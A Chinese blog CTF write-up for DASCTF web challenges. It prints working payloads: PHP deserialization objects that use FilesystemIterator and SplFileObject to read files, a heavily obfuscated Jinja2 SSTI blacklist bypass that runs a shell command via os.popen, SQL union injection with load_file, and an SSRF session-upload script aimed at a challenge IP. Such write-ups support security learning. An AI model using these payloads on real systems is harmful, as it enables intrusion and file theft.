DASCTF

最新推荐文章于 2024-04-21 11:16:34 发布

b1ue0cean

最新推荐文章于 2024-04-21 11:16:34 发布

阅读量790

点赞数

分类专栏： CTF 文章标签：安全

本文链接：https://blog.csdn.net/qq_53755216/article/details/115263313

版权

CTF 专栏收录该内容

59 篇文章 7 订阅

订阅专栏

ez_serialize

直接看源码

<?php
error_reporting(0);
highlight_file(__FILE__);

class A{
    public $class;
    public $para;
    public $check;
    public function __construct()
    {
        $this->class = "B";
        $this->para = "ctfer";
        echo new  $this->class ($this->para);
    }
    public function __wakeup()
    {
        $this->check = new C;
        if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
            echo new  $this->class ($this->para);
        }
        else
            die('bad hacker~');
    }

}
class B{
    var $a;
    public function __construct($a)
    {
        $this->a = $a;
        echo ("hello ".$this->a);
    }
}
class C{

    function vaild($code){
        $pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
        if (preg_match($pattern, $code)){
            return false;
        }
        else
            return true;
    }
}


if(isset($_GET['pop'])){
    unserialize($_GET['pop']);
}
else{
    $a=new A;

} hello ctfer

提示的很明显了 class调一个函数 para为参数只是我不知道调什么函数。。。

echo new  $this->class ($this->para);

用FilesystemIterator遍历目录

<?php
class A{
    public $class='FilesystemIterator';
    public $para="/var/www/html";
    }
$o  = new A();
echo serialize($o);

用SplFileObject读取文件

<?php

class A{
    public $class='SplFileObject';
    public $para = '/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php';
}

$a = new A();
echo serialize($a);

baby flask

直接给出过滤的信息。。。限制的可真全啊

<!--
Hi young boy!</br>
Do you like ssti?</br>

blacklist</br>   
'.','[','\'','"',''\\','+',':','_',</br>   
'chr','pop','class','base','mro','init','globals','get',</br>   
'eval','exec','os','popen','open','read',</br>   
'select','url_for','get_flashed_messages','config','request',</br>   
'count','length','０','１','２','３','４','５','６','７','８','９','0','1','2','3','4','5','6','7','8','9'</br>    
</br>   

-->

很轻松发现ssti点
在这里插入图片描述
这题应该是极其复杂的编码拼接（/(ㄒoㄒ)/~~
学到了利用过滤器

('__clas','s__')|join
dict(__clas=a,s__=b)|join
"__claee__"|replace("ee","ss")

贴一下别的师傅的wp

{% set id=dict(ind=a,ex=a)|join%}{% set pp=dict(po=a,p=a)|join%}{% set ls=dict(ls=a)|join%}{% set ppe=dict(po=a,pen=a)|join%}{% set gt=dict(ge=a,t=a)|join%}{% set cr=dict(ch=a,r=a)|join%}{% set nn=dict(n=a)|join%}{% set tt=dict(t=a)|join%}{% set ff=dict(f=a)|join%}{% set ooqq=dict(o=a,s=a)|join %}{% set rd=dict(re=a,ad=a)|join%}{% set five=(lipsum|string|list)|attr(id)(tt) %}{% set three=(lipsum|string|list)|attr(id)(nn) %}{% set one=(lipsum|string|list)|attr(id)(ff) %}{% set shiba=five*five-three-three-one %}{% set xiahuaxian=(lipsum|string|list)|attr(pp)(shiba) %}{% set gb=(xiahuaxian,xiahuaxian,dict(glob=a,als=a)|join,xiahuaxian,xiahuaxian)|join %}{% set bin=(xiahuaxian,xiahuaxian,dict(builtins=a)|join,xiahuaxian,xiahuaxian)|join %}{% set chcr=(lipsum|attr(gb))|attr(gt)(bin)|attr(gt)(cr) %}{% set xiegang=chcr(three*five*five-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one)%}{% set space=chcr(three*three*five-five-five-three) %}{% set shell=(ls,space,xiegang,dict(var=a)|join,xiegang,dict(www=a)|join,xiegang,dict(flask=a)|join)|join %}{{(lipsum|attr(gb))|attr(gt)(ooqq)|attr(ppe)(shell)|attr(rd)()}}

BEST_DB

很直白的一个sql注入
在这里插入图片描述

这题并没有过滤 " ,并且过滤的空格可以轻松用%20或/**/进行绕过
不过值得注意的是直接在框框内输入并不会有回显进行url编码后貌似就不可以了
直接用联合注入爆库
得到flag.txt文件
用load_file()读取 /flag.txt文件即可
由于过滤了 / ，可以用编码绕过但别忘了前面要加个 0x
一开始在load_file()里面加了个"" ,结果死活不对。。。
在这里插入图片描述

easy_login

<?php
    if(!isset($_SESSION)){
        highlight_file(__FILE__);
        die("no session");
    }
    include("./php/check_ip.php");
    error_reporting(0);
    $url = $_GET['url'];
    if(check_inner_ip($url)){
        if($url){
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
            $output = curl_exec($ch);
            $result_info = curl_getinfo($ch);
            curl_close($ch);
            }
    }else{
        echo "Your IP is internal yoyoyo";
    }
    
?>

# -*- coding: utf-8 -*-
import requests

url = 'http://183.129.189.60:10015/?url=http://localhost/admin.php'
data = {'PHP_SESSION_UPLOAD_PROGRESS':'nmd'}
file = {'file':('r.txt')}
cookie = {'PHPSESSID':'nmd'}

r = requests.post(url=url, data=data, files=file, cookies=cookie)

print(r.text)

加入了PHP_SESSION_UPLOAD_PROGRESS 相当于session_start

可以参考buuctf中的（PWN。。。）baby_ctf
几乎是一模一样 emmmm。。。有抄袭嫌疑

b1ue0cean

关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
1
评论
DASCTF

ez_serialize题目网址：http://684f47cd-5c9d-41cb-ad29-98d48096cc9a.machine.dasctf.com/<?phperror_reporting(0);highlight_file(__FILE__);class A{ public $class; public $para; public $check; public function __construct() { $thi
复制链接

扫一扫

专栏目录